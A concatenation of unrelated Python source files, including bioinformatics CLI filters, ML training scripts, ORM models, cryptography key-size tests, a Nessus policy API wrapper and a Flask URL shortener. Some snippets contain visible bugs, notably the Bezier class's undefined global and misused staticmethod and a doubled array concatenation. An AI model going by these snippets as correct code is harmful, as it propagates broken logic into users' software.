help=(
"Minimum ratio of fragments supporting variant allele to total RNA fragments "
"(default %(default)s)."))
filter_group.add_argument(
"--min-ratio-alt-to-other-fragments",
type=float,
default=MIN_RATIO_RNA_ALT_TO_OTHER_FRAGMENTS,
help=(
"At loci where alleles other than the ref and a single alt are supported, "
"this parameter controls how many more times fragments supporting "
"the variant allele are required relative to other non-reference "
"alleles (default %(default)s)."))
return filter_group
def filter_threshold_dict_from_args(args):
"""
Convert names of filters from external CLI options to more
consistent naming scheme of {min|max}_{Isovar property}.
Returns OrderedDict
"""
d = OrderedDict()
d["min_ratio_alt_to_other_fragments"] = args.min_ratio_alt_to_other_fragments
d["min_fraction_alt_fragments"] = args.min_alt_rna_fraction
d["min_num_alt_fragments"] = args.min_alt_rna_fragments
d["min_num_alt_reads"] = args.min_alt_rna_reads
return d
|
from sqlalchemy import Column, Integer, String, ForeignKey
from app.models.base import Base, db
from app.models.contest import Contest
from app.models.problem import Problem
class ProblemContestRel(Base):
__tablename__ = 'problem_contest_rel'
id = Column(Integer, primary_key=True, autoincrement=True)
problem_id = Column(Integer, ForeignKey(Problem.id))
contest_id = Column(Integer, ForeignKey(Contest.id))
problem_id_in_contest = Column(String(100))
@property
def problem(self):
p = Problem.get_by_id(self.problem_id)
p.problem_id = self.problem_id_in_contest
p.show('problem_id')
return p
@classmethod
def get_by_problem_id_and_contest_id(cls, contest_id, problem_id):
r = cls.search(contest_id=contest_id, problem_id=problem_id)['data']
if r:
return r[0]
return None
@classmethod
def get_by_problem_id_in_contest(cls, contest_id, id_in_contest):
r = cls.search(contest_id=contest_id, problem_id_in_contest=id_in_contest)['data']
if r:
return r[0]
return None
@staticmethod
def get_problems_by_contest_id(contest_id):
from sqlalchemy import asc
problem_info_list = db.session.query(Problem, ProblemContestRel.problem_id_in_contest). \
filter(Problem.id == ProblemContestRel.problem_id). \
filter(ProblemContestRel.contest_id == contest_id). \
order_by(asc(ProblemContestRel.problem_id_in_contest)).all()
def change_problem_id(p, id_):
p.problem_id = id_
p.show('problem_id')
return p
return [change_problem_id(p, id_) for p, id_ in problem_info_list]
@staticmethod
def delete_contest(contest_id):
db.session.query(ProblemContestRel). \
filter(ProblemContestRel.contest_id == contest_id). \
delete()
|
from matplotlib import rcParams
import numpy as np
# eternally grateful to http://blog.dmcdougall.co.uk/publication-ready-the-first-time-beautiful-reproducible-plots-with-matplotlib/
def default():
reference = 16
rcParams['axes.titlesize'] = 1 * reference
rcParams['axes.labelsize'] = 1 * reference
rcParams['xtick.labelsize'] = 0.8 * reference
rcParams['ytick.labelsize'] = 0.8 * reference
rcParams['legend.fontsize'] = 0.8 * reference
rcParams['axes.linewidth'] = .5
rcParams['lines.linewidth'] = .5
rcParams['patch.linewidth'] = .5
rcParams['font.family'] = 'sans-serif'
rcParams['font.serif'] = ['DejaVu Sans']
rcParams['text.usetex'] = True
WIDTH = 489.38739 # the number latex spits out
# FACTOR = 0.49 # the fraction of the width you'd like the figure to occupy
FACTOR = 1.0
fig_width_pt = WIDTH * FACTOR
inches_per_pt = 1.0 / 72.27
golden_ratio = (np.sqrt(5) - 1.0) / 2.0 # because it looks good
fig_width_in = fig_width_pt * inches_per_pt # figure width in inches
fig_height_in = fig_width_in * golden_ratio # figure height in inches
fig_dims = [fig_width_in, fig_height_in] # fig dims as a list
rcParams['figure.figsize'] = fig_dims
return rcParams
|
import tensorflow as tf
import tensorflow_addons as tfa
from vit_keras import vit, utils, visualize
from dataset import COVIDxCTDataset
from math import ceil
import os
import numpy as np
import pickle
import matplotlib.pyplot as plt
Training = True
DATA_DIR = '../2A_images/'
# TRAIN_LABEL_FILE = '../train_COVIDx_CT-2A.txt'
TRAIN_LABEL_FILE = './resampled_train_COVIDx_CT-2A.txt'
VAL_LABEL_FILE = '../val_COVIDx_CT-2A.txt'
TEST_LABEL_FILE = '../test_COVIDx_CT-2A.txt'
BATCH_SIZE = 64
IMAGE_SIZE = (224, 224)
PATCH_SIZE = 16
NUM_EPOCHS = 20
INPUT_HEIGHT = 512
INPUT_WIDTH = 512
MAX_BBOX_JITTER = 0.075
MAX_ROTATION = 15
MAX_SHEAR = 0.2
MAX_PIXEL_SHIFT = 15
MAX_PIXEL_SCALE_CHANGE = 0.15
CLASS_NAMES = ['Normal', 'Pneumonia', 'COVID-19']
N_CLASS = len(CLASS_NAMES)
CLASS_DICT = {0: 'Normal', 1: 'Pneumonia', 2: 'COVID-19'}
dataset = COVIDxCTDataset(
DATA_DIR,
image_height=INPUT_HEIGHT,
image_width=INPUT_WIDTH,
target_height=IMAGE_SIZE[0],
target_width=IMAGE_SIZE[1],
max_bbox_jitter=MAX_BBOX_JITTER,
max_rotation=MAX_ROTATION,
max_shear=MAX_SHEAR,
max_pixel_shift=MAX_PIXEL_SHIFT,
max_pixel_scale_change=MAX_PIXEL_SCALE_CHANGE
)
tr_dataset, tr_num_images, tr_batch_size = dataset.train_dataset(TRAIN_LABEL_FILE, BATCH_SIZE)
tr_iter_per_epoch = ceil(tr_num_images / tr_batch_size)
val_dataset, val_num_images, val_batch_size = dataset.validation_dataset(VAL_LABEL_FILE, BATCH_SIZE)
val_iter_per_epoch = ceil(val_num_images / val_batch_size)
test_dataset, test_num_images, test_batch_size = dataset.validation_dataset(TEST_LABEL_FILE, BATCH_SIZE)
test_iter_per_epoch = ceil(test_num_images / test_batch_size)
base_model = vit.vit_b16(
image_size=IMAGE_SIZE[0],
activation='softmax',
pretrained=True,
include_top=False,
pretrained_top=False
)
base_model.summary()
x = base_model.output
x = tf.keras.layers.Dropout(0.5)(x)
x = tf.keras.layers.Dense(256, activation='relu')(x)
y = tf.keras.layers.Dense(N_CLASS, activation='softmax')(x)
model = tf.keras.Model(base_model.input, y)
model.summary()
optimizer = tf.keras.optimizers.Adam(
learning_rate=tf.keras.experimental.CosineDecay(
initial_learning_rate=1e-4, decay_steps=5000))
train_loss = tf.keras.metrics.Mean(name='train_loss')
train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(name='train_acc')
val_loss = tf.keras.metrics.Mean(name='val_loss')
val_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(name='val_acc')
@tf.function
def train_step(data):
with tf.GradientTape() as tape:
inp = data['image']
y_true = data['label']
y_pred = model(inp)
loss = tf.keras.losses.SparseCategoricalCrossentropy()(y_true, y_pred)
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
train_loss(loss)
train_accuracy(y_true, y_pred)
@tf.function
def val_step(data):
inp = data['image']
y_true = data['label']
y_pred = model(inp, training=False)
loss = tf.keras.losses.SparseCategoricalCrossentropy()(y_true, y_pred)
val_loss(loss)
val_accuracy(y_true, y_pred)
@tf.function
def predict_step(data):
img = data['image']
y_true = data['label']
y_hat = model(img, training=False)
return y_true, y_hat
ckpt_path = './ViT/checkpoint/'
result_path = './ViT/results/'
BEST_VAL_LOSS = 999999
BEST_VAL_ACC = 0
current_patience = patience = 3
if not os.path.exists(ckpt_path):
os.makedirs(ckpt_path)
if not os.path.exists(result_path):
os.makedirs(result_path)
tr_data_iter = iter(tr_dataset)
for step in range(NUM_EPOCHS * tr_iter_per_epoch):
tr_data = next(tr_data_iter)
train_step(tr_data)
if step % 100 == 0:
for idx, data in enumerate(val_dataset):
val_step(data)
print(
f'\nStep {step + 1}, '
f'Loss: {train_loss.result().numpy()}, '
f'Accuracy: {train_accuracy.result().numpy() * 100}, '
f'Val Loss: {val_loss.result().numpy()}, '
f'Val Accuracy: {val_accuracy.result().numpy() * 100}\n'
)
print(f'\n LR: {tf.keras.backend.get_value(optimizer.learning_rate)}\n')
if BEST_VAL_ACC < val_accuracy.result().numpy():
print('Improved')
BEST_VAL_ACC = val_accuracy.result().numpy()
model.save_weights(f'{ckpt_path}covid_vit.h5')
current_patience = patience
else:
current_patience -= 1
if current_patience == 0:
# tf.keras.backend.set_value(optimizer.learning_rate,
# max(tf.keras.backend.get_value(optimizer.learning_rate) * 0.5, 1e-7))
# print(f'\n LR: {tf.keras.backend.get_value(optimizer.learning_rate)}\n')
current_patience = patience
train_loss.reset_states()
train_accuracy.reset_states()
val_loss.reset_states()
val_accuracy.reset_states()
plt.close('all')
fig, axes = plt.subplots(3, 3, figsize=(16, 16))
indices = np.random.choice(list(range(BATCH_SIZE)), 9)
for index, ax in zip(indices, axes.ravel()):
image = tr_data['image'].numpy()[index]
# Display
cls = tr_data['label'].numpy()[index]
ax.imshow(image)
ax.set_title('Class: {} ({})'.format(CLASS_NAMES[cls], cls))
plt.savefig(f'{result_path}test_img_{step}.png')
model.load_weights(f'{ckpt_path}covid_vit.h5')
y_pred_test = []
test_labels = []
for idx, data in enumerate(test_dataset):
test_y, pred_y = predict_step(data)
y_pred_test.append(pred_y.numpy())
test_labels.append(test_y.numpy())
y_pred_test = np.concatenate(y_pred_test, axis=0)
test_labels = np.concatenate(test_labels, axis=0)
y_pred_test = np.concatenate(y_pred_test, axis=0)
test_labels = np.concatenate(test_labels, axis=0)
prediction_dict = dict()
prediction_dict['test_y_pred'] = y_pred_test
prediction_dict['test_y_pred_cat'] = np.argmax(y_pred_test, axis=1)
prediction_dict['test_y'] = test_labels
with open(f'{result_path}pred_true.pkl', 'wb') as f:
pickle.dump(prediction_dict, f)
|
import logging
import torch
import torch.nn as nn
import torch.nn.functional as F
from models.model_utils import ConvBlock, _ResNet, _ResnetBasicBlock
class BaseEncoder(nn.Module):
def __init__(
self,
n_input_channels: int = 1,
n_output_channels: int = 512,
p_dropout: float = 0.0,
time_downsample_ratio: int = 16,
**kwargs
):
super().__init__()
self.n_input_channels = n_input_channels
self.p_dropout = p_dropout
self.n_output_channels = n_output_channels
self.time_downsample_ratio = time_downsample_ratio
class PannResNet22(BaseEncoder):
"""
Derived from PANN ResNet22 network. PannResNet22L17 has 4 basic resnet blocks
"""
def __init__(self, n_input_channels: int = 1, p_dropout: float = 0.0, **kwargs):
"""
:param n_input_channels: Number of input channels.
:param p_dropout: Dropout probability.
:param pretrained: If True, load pretrained model.
"""
super().__init__(
n_input_channels=n_input_channels,
n_output_channels=512,
p_dropout=p_dropout,
time_downsample_ratio=16,
)
self.conv_block1 = ConvBlock(in_channels=n_input_channels, out_channels=64)
self.resnet = _ResNet(block=_ResnetBasicBlock, layers=[2, 2, 2, 2], zero_init_residual=True)
def forward(self, x):
"""
Input: Input x: (batch_size, n_channels, n_timesteps, n_features)"""
x = self.conv_block1(x, pool_size=(2, 2), pool_type="avg")
x = F.dropout(x, p=self.p_dropout, training=self.training, inplace=True)
x = self.resnet(x)
return x
if __name__ == "__main__":
encoder = PannResNet22(n_input_channels=7)
pytorch_total_params = sum(
p.numel() for p in encoder.parameters() if p.requires_grad
)
print("number of trainable params: {}".format(pytorch_total_params))
# print(type(encoder))
# print(encoder.__dict__)
# print(encoder)
x = torch.rand((16, 7, 320, 128))
y = encoder.forward(x)
print(y.shape)
print('time downsample ratio: {}'.format(320 / y.shape[2]))
print('freq downsample ratio: {}'.format(128 / y.shape[3]))
|
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import binascii
import pytest
from cryptography.exceptions import _Reasons
from cryptography.hazmat.primitives import ciphers
from cryptography.hazmat.primitives.ciphers.algorithms import (
AES, ARC4, Blowfish, CAST5, Camellia, IDEA, SEED, TripleDES
)
from cryptography.hazmat.primitives.ciphers.modes import ECB
from ...utils import raises_unsupported_algorithm
class TestAES(object):
@pytest.mark.parametrize(("key", "keysize"), [
(b"0" * 32, 128),
(b"0" * 48, 192),
(b"0" * 64, 256),
])
def test_key_size(self, key, keysize):
cipher = AES(binascii.unhexlify(key))
assert cipher.key_size == keysize
def test_invalid_key_size(self):
with pytest.raises(ValueError):
AES(binascii.unhexlify(b"0" * 12))
class TestCamellia(object):
@pytest.mark.parametrize(("key", "keysize"), [
(b"0" * 32, 128),
(b"0" * 48, 192),
(b"0" * 64, 256),
])
def test_key_size(self, key, keysize):
cipher = Camellia(binascii.unhexlify(key))
assert cipher.key_size == keysize
def test_invalid_key_size(self):
with pytest.raises(ValueError):
Camellia(binascii.unhexlify(b"0" * 12))
class TestTripleDES(object):
@pytest.mark.parametrize("key", [
b"0" * 16,
b"0" * 32,
b"0" * 48,
])
def test_key_size(self, key):
cipher = TripleDES(binascii.unhexlify(key))
assert cipher.key_size == 192
def test_invalid_key_size(self):
with pytest.raises(ValueError):
TripleDES(binascii.unhexlify(b"0" * 12))
class TestBlowfish(object):
@pytest.mark.parametrize(("key", "keysize"), [
(b"0" * (keysize // 4), keysize) for keysize in range(32, 449, 8)
])
def test_key_size(self, key, keysize):
cipher = Blowfish(binascii.unhexlify(key))
assert cipher.key_size == keysize
def test_invalid_key_size(self):
with pytest.raises(ValueError):
Blowfish(binascii.unhexlify(b"0" * 6))
class TestCAST5(object):
@pytest.mark.parametrize(("key", "keysize"), [
(b"0" * (keysize // 4), keysize) for keysize in range(40, 129, 8)
])
def test_key_size(self, key, keysize):
cipher = CAST5(binascii.unhexlify(key))
assert cipher.key_size == keysize
def test_invalid_key_size(self):
with pytest.raises(ValueError):
CAST5(binascii.unhexlify(b"0" * 34))
class TestARC4(object):
@pytest.mark.parametrize(("key", "keysize"), [
(b"0" * 10, 40),
(b"0" * 14, 56),
(b"0" * 16, 64),
(b"0" * 20, 80),
(b"0" * 32, 128),
(b"0" * 48, 192),
(b"0" * 64, 256),
])
def test_key_size(self, key, keysize):
cipher = ARC4(binascii.unhexlify(key))
assert cipher.key_size == keysize
def test_invalid_key_size(self):
with pytest.raises(ValueError):
ARC4(binascii.unhexlify(b"0" * 34))
class TestIDEA(object):
def test_key_size(self):
cipher = IDEA(b"\x00" * 16)
assert cipher.key_size == 128
def test_invalid_key_size(self):
with pytest.raises(ValueError):
IDEA(b"\x00" * 17)
class TestSEED(object):
def test_key_size(self):
cipher = SEED(b"\x00" * 16)
assert cipher.key_size == 128
def test_invalid_key_size(self):
with pytest.raises(ValueError):
SEED(b"\x00" * 17)
def test_invalid_backend():
pretend_backend = object()
with raises_unsupported_algorithm(_Reasons.BACKEND_MISSING_INTERFACE):
ciphers.Cipher(AES(b"AAAAAAAAAAAAAAAA"), ECB, pretend_backend)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import json
class Settings:
SETTINGS_FILE_NAME = 'settings.json'
def __init__(self):
# 出力先ディレクトリーのパス
self.dst_dir_path = ''
# mdpiにおける幅
self.mdpi_image_width = 24
# フォアグラウンドカラー(空文字列だと塗らない)
self.fg_color_str = ''
def save(self, file_path):
settings_json = {}
settings_json['dstDirPath'] = self.dst_dir_path
settings_json['mdpiImageWidth'] = self.mdpi_image_width
settings_json['fgColorStr'] = self.fg_color_str
with open(file_path, 'w') as f:
json.dump(settings_json, f)
def load(self, file_path):
with open(file_path, 'r') as f:
settings_json = json.load(f)
self.dst_dir_path = settings_json['dstDirPath']
self.mdpi_image_width = settings_json['mdpiImageWidth']
self.fg_color_str = settings_json['fgColorStr']
|
import json
import datetime
import peewee as pw
import pendulum
def patch_datetime_type():
pw.MySQLDatabase.field_types.update({'DATETIME': 'DATETIME(6)'})
pw.PostgresqlDatabase.field_types.update({'DATETIME': 'TIMESTAMPTZ'})
patch_datetime_type()
class DatetimeTZField(pw.Field):
field_type = 'DATETIME'
def python_value(self, value):
if isinstance(value, str):
return pendulum.parse(value)
if isinstance(value, datetime.datetime):
return pendulum.instance(value)
return value
def db_value(self, value):
if value is None:
return value
if not isinstance(value, datetime.datetime):
raise ValueError('datetime instance required')
if value.utcoffset() is None:
raise ValueError('timezone aware datetime required')
if isinstance(value, pendulum.DateTime):
value = datetime.datetime.fromtimestamp(
value.timestamp(), tz=value.timezone)
return value.astimezone(datetime.timezone.utc)
class JSONCharField(pw.CharField):
def __init__(self, ensure_ascii=True, *args, **kwargs):
self.ensure_ascii = ensure_ascii
super(JSONCharField, self).__init__(*args, **kwargs)
def db_value(self, value):
if value is None:
return value
data = json.dumps(value, ensure_ascii=self.ensure_ascii)
if len(data) > self.max_length:
raise ValueError('Data too long for field {}.'.format(self.name))
return data
def python_value(self, value):
if value is None:
return value
return json.loads(value)
|
import numpy as np
# Bezier Class representing a CUBIC bezier defined by four
# control points.
#
# at(t): gets a point on the curve at t
# distance2(pt) returns the closest distance^2 of
# pt and the curve
# closest(pt) returns the point on the curve
# which is closest to pt
# maxes(pt) plots the curve using matplotlib
class Bezier(object):
exp3 = np.array([[3, 3], [2, 2], [1, 1], [0, 0]], dtype=np.float32)
exp3_1 = np.array([[[3, 3], [2, 2], [1, 1], [0, 0]]], dtype=np.float32)
exp4 = np.array([[4], [3], [2], [1], [0]], dtype=np.float32)
boundaries = np.array([0, 1], dtype=np.float32)
# Initialize the curve by assigning the control points.
# Then create the coefficients.
def __init__(self, points):
assert isinstance(points, np.ndarray)
assert points.dtype == np.float32
self.points = points
self.create_coefficients()
# Create the coefficients of the bezier equation, bringing
# the bezier in the form:
# f(t) = a * t^3 + b * t^2 + c * t^1 + d
#
# The coefficients have the same dimensions as the control
# points.
def create_coefficients(self):
co_coeffs = np.array([[-1, 3, -3, 1], [3, -6, 3, 0], [-3, 3, 0, 0], [1, 0, 0, 0]], dtype=np.float32)
coeffs = np.multiply(co_coeffs.reshape((4, 4, 1)), points.reshape((1, 4, 2)))
self.coeffs = np.sum(coeffs, axis=1).reshape(-1, 4, 2)
# Return a point on the curve at the parameter t.
def at(self, t):
if type(t) != np.ndarray:
t = np.array(t)
pts = self.coeffs * np.power(t, self.exp3_1)
return np.sum(pts, axis = 1)
# Return the closest DISTANCE (squared) between the point pt
# and the curve.
def distance2(self, pt):
points, distances, index = self.measure_distance(pt)
return distances[index]
# Return the closest POINT between the point pt
# and the curve.
def closest(self, pt):
points, distances, index = self.measure_distance(pt)
return points[index]
# Measure the distance^2 and closest point on the curve of
# the point pt and the curve. This is done in three steps:
# (1) Define the distance^2 depending on the pt. Use the squared
# distance to prevent an additional root.
# D(t) = (f(t) - pt)^2
# (2) The roots of D'(t) are the extremes of D(t) and contain the
# closest points on the unclipped curve. Only keep the minima
# by checking if D''(roots) > 0 and discard imaginary roots.
# Compare the distances of "pt" to the minima as well as the
# start and end of the curve and return the index of the
# shortest distance.
#
# This desmos graph is a helpful visualization.
# https://www.desmos.com/calculator/ktglugn1ya
def measure_distance(self, pt):
coeffs = self.coeffs
# These are the coefficients of the derivatives d/dx and d/(d/dx).
da = 6*np.sum(coeffs[0][0]*coeffs[0][0])
db = 10*np.sum(coeffs[0][0]*coeffs[0][1])
dc = 4*(np.sum(coeffs[0][1]*coeffs[0][1]) + 2*np.sum(coeffs[0][0]*coeffs[0][2]))
dd = 6*(np.sum(coeffs[0][0]*(coeffs[0][3]-pt)) + np.sum(coeffs[0][1]*coeffs[0][2]))
de = 2*(np.sum(coeffs[0][2]*coeffs[0][2])) + 4*np.sum(coeffs[0][1]*(coeffs[0][3]-pt))
df = 2*np.sum(coeffs[0][2]*(coeffs[0][3]-pt))
dda = 5*da
ddb = 4*db
ddc = 3*dc
ddd = 2*dd
dde = de
dcoeffs = np.stack([da, db, dc, dd, de, df])
ddcoeffs = np.stack([dda, ddb, ddc, ddd, dde]).reshape(-1, 1)
# Calculate the real extremes, by getting the roots of the first
# derivativ of the distance function.
extrema = Bezier.np_real_roots(dcoeffs)
# Remove the roots which are out of bounds of the clipped range [0, 1].
# [future reference] https://stackoverflow.com/questions/47100903/deleting-every-3rd-element-of-a-tensor-in-tensorflow
dd_clip = (np.sum(ddcoeffs * np.power(extrema, self.exp4)) >= 0) & (extrema > 0) & (extrema < 1)
minima = extrema[dd_clip]
# Add the start and end position as possible positions.
potentials = np.concatenate((minima, self.boundaries))
# Calculate the points at the possible parameters t and
# get the index of the closest
points = self.at(potentials.reshape(-1, 1, 1))
distances = np.sum(np.square(points - pt), axis = 1)
index = np.argmin(distances)
return points, distances, index
# Point the curve to a matplotlib figure.
# maxes ... the axes of a matplotlib figure
def plot(self, maxes):
import matplotlib.path as mpath
import matplotlib.patches as mpatches
Path = mpath.Path
pp1 = mpatches.PathPatch(
Path(self.points, [Path.MOVETO, Path.CURVE4, Path.CURVE4, Path.CURVE4]),
fc="none")#, transform=ax.transData)
pp1.set_alpha(1)
pp1.set_color('#00cc00')
pp1.set_fill(False)
pp2 = mpatches.PathPatch(
Path(self.points, [Path.MOVETO, Path.LINETO , Path.LINETO , Path.LINETO]),
fc="none")#, transform=ax.transData)
pp2.set_alpha(0.2)
pp2.set_color('#666666')
pp2.set_fill(False)
maxes.scatter(*zip(*self.points), s=4, c=((0, 0.8, 1, 1), (0, 1, 0.5, 0.8), (0, 1, 0.5, 0.8),
(0, 0.8, 1, 1)))
maxes.add_patch(pp2)
maxes.add_patch(pp1)
# Wrapper around np.roots, but only returning real
# roots and ignoring imaginary results.
@staticmethod
def np_real_roots(self, coefficients, EPSILON=1e-6):
r = np.roots(coefficients)
return r.real[abs(r.imag) < EPSILON]
if __name__ == '__main__':
import math
def matplotlib_example(bez, use_text):
import matplotlib.pyplot as plt
import matplotlib.path as mpath
import matplotlib.patches as mpatches
def onclick(event):
if event.inaxes == None:return
pt = np.array((event.xdata, event.ydata), dtype=np.float)
print("pt", pt)
points, distances, index = bez.measure_distance(pt)
closest = points[index]
distance = math.floor(distances[index])
Path = mpath.Path
pp1 = mpatches.PathPatch(Path([pt, closest], [Path.MOVETO, Path.LINETO]), fc="none")
pp1.set_color("#95a7df")
ax.add_patch(pp1)
ax.scatter(*pt, s=32, facecolors='none', edgecolors='b')
if use_text:
ax.text(*((pt+closest)/2), str(distance))
ax.text(*pt, str(pt.astype(np.int)))
ax.text(*closest, str(closest.astype(np.int)))
fig.canvas.draw()
return None
fig, ax = plt.subplots()
cid = fig.canvas.mpl_connect('button_press_event', onclick)
ax.grid()
ax.axis('equal')
ax.margins(0.4)
bez.plot(ax)
plt.title("Click next to the curve.")
plt.show()
def opencv_example(bez, shape, fac = 3):
img = np.zeros(shape, dtype=np.float)
for y in range(img.shape[0]):
for x in range(img.shape[1]):
img[y, x] = bez.distance2((x, y))
print(y, "/", shape[0])
import cv2
img = np.power(img, 1/3)
img = ((1-(img / np.max(img)))*255).astype(np.uint8)
img = np.flip(img, axis=0)
resized_image = cv2.resize(img, (shape[1]*fac, shape[0]*fac), interpolation=cv2.INTER_NEAREST)
cv2.imshow("distance", resized_image)
cv2.waitKey(1)
if __name__ == '__main__':
# Create a Bezier object with four control points.
points = np.array([[0, 0], [0, 1], [1,.8], [1.5,1]]).astype(np.float32)
points *= 50
points += 10
bez = Bezier(points)
opencv_example(bez, shape = (80, 110))
matplotlib_example(bez, use_text = False)
|
'''
Policies
========
Methods described in this section relate to the the files API.
These methods can be accessed at ``Nessus.policies``.
.. rst-class:: hide-signature
.. autoclass:: PoliciesAPI
:members:
'''
from io import BytesIO
from typing import Optional, Dict, List
from tenable.base.endpoint import APIEndpoint
class PoliciesAPI(APIEndpoint): # noqa PLC0115
_path = 'policies'
def copy(self, policy_id: int) -> Dict:
'''
Duplicates an existing scan policy.
Args:
policy_id (int): The id of the policy to clone.
Returns:
Dict:
The cloned policy object.
Example:
>>> nessus.policies.copy(1)
'''
return self._post(f'{policy_id}/copy')
def create(self, uuid: str, **kwargs) -> Dict:
'''
Creates a new scan policy using the provided settings.
Args:
uuid (str): The UUID for the editor template to use.
**kwargs (dict): Additional settings to use to create the policy.
Returns:
Dict:
Response object with identifying information on the new policy
Example:
>>> tmpl = '731a8e52-3ea6-a291-ec0a-d2ff0619c19d7bd788d6be818b65'
>>> nessus.policies.create(tmpl_uuid, settings={
... 'name': 'Sample Policy'
... })
'''
kwargs['uuid'] = uuid
return self._post(json=kwargs)
def delete(self, policy_id: int) -> None:
'''
Deletes the specified scan policy.
Args:
policy_id (int): The id of the policy to delete.
Example:
>>> nessus.policies.delete(1)
'''
return self._delete(f'{policy_id}')
def delete_many(self, policy_ids: List[int]) -> List[int]:
'''
Deletes the specified scan policies.
Args:
policy_ids (list[int]): The list of policy ids to delete.
Example:
>>> nessus.policies.delete_many([1, 2, 3])
'''
return self._delete(json={'ids': policy_ids})['deleted']
def details(self, policy_id: int) -> Dict:
'''
Returns the details of the selected policy.
Args:
policy_id (int): The id of the policy to retrieve.
Returns:
Dict:
The policy object.
Example:
>>> nessus.policies.details(1)
'''
return self._get(f'{policy_id}')
def edit(self, policy_id: int, **kwargs) -> None:
'''
Updates an existing scan policy.
Args:
policy_id (int): The id of the policy to edit.
**kwargs (dict): Attributes to be passed into the JSON body.
Example:
>>> policy = nessus.policies.details(1)
>>> policy['settings']['name'] = 'Updated Policy'
>>> nessus.policies.edit(1, **policy)
'''
return self._put(f'{policy_id}', json=kwargs)
def import_policy(self, fobj: BytesIO) -> Dict:
'''
Imports the policy into the nessus scanner.
Args:
fobj (BytesIO): The file object containing the policy.
Returns:
Dict:
The imported policy object.
Example:
>>> with open('policy.xml', 'rb') as policy:
... nessus.policies.import_policy(policy)
'''
filename = self._api.files.upload(fobj)
return self._post('import', json={'file': filename})
def export_policy(self,
policy_id: int,
fobj: Optional[BytesIO] = None,
**kwargs
) -> BytesIO:
'''
Export the specified policy and download it.
Args:
policy_id (int): The id of the policy to export.
fobj (BytexIO, optional):
The file object to write the exported file to. If none is
specified then a BytesIO object is written to in memory.
chunk_size (int, optional):
The chunk sizing for the download itself.
stream_hook (callable, optional):
Overload the default downloading behavior with a custom
stream hook.
hook_kwargs (dict, optional):
keyword arguments to pass to the stream_hook callable in
addition to the default passed params.
'''
kwargs['fobj'] = fobj
token = self._get(f'{policy_id}/export/prepare')['token']
return self._api.tokens._fetch(token, **kwargs) # noqa PLW0212
def list(self,) -> List[Dict]:
'''
Lists the available policies.
Returns:
List[Dict]:
List of policy objects.
Example:
>>> for policy in nessus.policies.list():
... print(policy)
'''
return self._get()['policies']
|
"""
Utils for web frameworks request filters.
"""
from six.moves import urllib
from epsagon.trace import trace_factory
from epsagon.constants import IGNORED_ENDPOINTS
# Ignored content types for web frameworks.
IGNORED_CONTENT_TYPES = [
'image',
'audio',
'video',
'font',
'zip',
'css',
]
IGNORED_FILE_TYPES = [
'.js',
'.jsx',
'.woff',
'.woff2',
'.ttf',
'.eot',
'.ico',
]
# Method to URL dict.
BLACKLIST_URLS = {
str.endswith: [
'epsagon.com',
'.amazonaws.com',
],
str.__contains__: [
'accounts.google.com',
'documents.azure.com',
'169.254.170.2' # AWS Task Metadata Endpoint
],
}
WHITELIST_URL = {
str.__contains__: [
'.execute-api.',
'.elb.amazonaws.com',
'.appsync-api.',
],
}
def is_blacklisted_url(url):
"""
Return whether the URL blacklisted or not.
Using BLACKLIST_URLS methods against the URLs.
:param url: url string
:return: True if URL is blacklisted, else False
"""
url = urllib.parse.urlparse(url).netloc
for method in WHITELIST_URL:
for whitelist_url in WHITELIST_URL[method]:
if method(url, whitelist_url):
return False
for method in BLACKLIST_URLS:
for blacklist_url in BLACKLIST_URLS[method]:
if method(url, blacklist_url):
return True
return False
def is_payload_collection_blacklisted(url):
"""
Return whether the payload should be collected according to the blacklisted
urls list in the Trace.
:param url: url string
:return: True if URL is blacklisted, else False
"""
url = urllib.parse.urlparse(url).netloc
trace_blacklist_urls = trace_factory.get_trace().url_patterns_to_ignore
return any(blacklist_url in url for blacklist_url in trace_blacklist_urls)
def ignore_request(content, path):
"""
Return true if HTTP request in web frameworks should be omitted.
:param content: accept mimetype header
:param path: request path
:return: Bool
"""
return (
any([x in content for x in IGNORED_CONTENT_TYPES]) or
any([path.endswith(x) for x in IGNORED_FILE_TYPES])
)
def add_ignored_endpoints(endpoints):
"""
add endpoints to the list of ignored ones..
:param endpoints: list of endpoints or None
:return: None
"""
if endpoints:
IGNORED_ENDPOINTS.extend(endpoints)
def is_ignored_endpoint(endpoint):
"""
return true if endpoint should be ignored.
:param endpoint: endpoint path
:return: Bool
"""
return endpoint in IGNORED_ENDPOINTS
|
from flask import Flask, request, render_template, abort
from db import *
from random import choice
import string
import requests
app = Flask(__name__)
ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits
HEADERS = {
"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
"Accept": "text/html;q=0.9,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close",
"DNT": "1",
"Upgrade-Insecure-Requests": "1"
}
def generate_slug(length):
return "".join((choice(ALPHABET) for _ in range(5)))
@app.route("/", methods=["GET", "POST"])
def main():
if request.method == "POST":
link = request.form.get("link")
if link is None:
return render_template("main.html", error="Fill in the URL")
if not link.startswith("http://") and not link.startswith("https://"):
link = "http://" + link
try:
requests.head(link, headers=HEADERS, timeout=0.05)
except:
return render_template("main.html", error="Page does not exist")
short_link = generate_slug(6)
Link.create(
id=short_link,
url=link
)
return render_template("main.html", short_link=short_link)
return render_template("main.html")
@app.route("/<slug>")
def follow(slug):
try:
link = Link.get(Link.id == slug)
except Link.DoesNotExist:
return render_template("unknown.html"), 404
return render_template("preroll.html", page=link.url)
if __name__ == '__main__':
app.run()
|
import graphene
from graphene_django import DjangoObjectType
from .models import Post
class PostType(DjangoObjectType):
class Meta:
model = Post
fields = ('id', 'title', 'description', 'image')
def resolve_image(self, info):
return self.image.thumbnails.large.url
class Query(graphene.ObjectType):
posts = graphene.List(PostType)
post = graphene.Field(PostType, id=graphene.Int())
@staticmethod
def resolve_posts(root, info):
return Post.objects.all()
@staticmethod
def resolve_post(root, info, id):
return Post.objects.get(pk=id)
|
from .kitti_dataset import KITTIRAWDataset, KITTIOdomDataset, KITTIDepthDataset
from .mc_dataset import MCDataset
|
# -*- coding: iso-8859-15 -*-
import ctypes
import json
import os
import pathlib
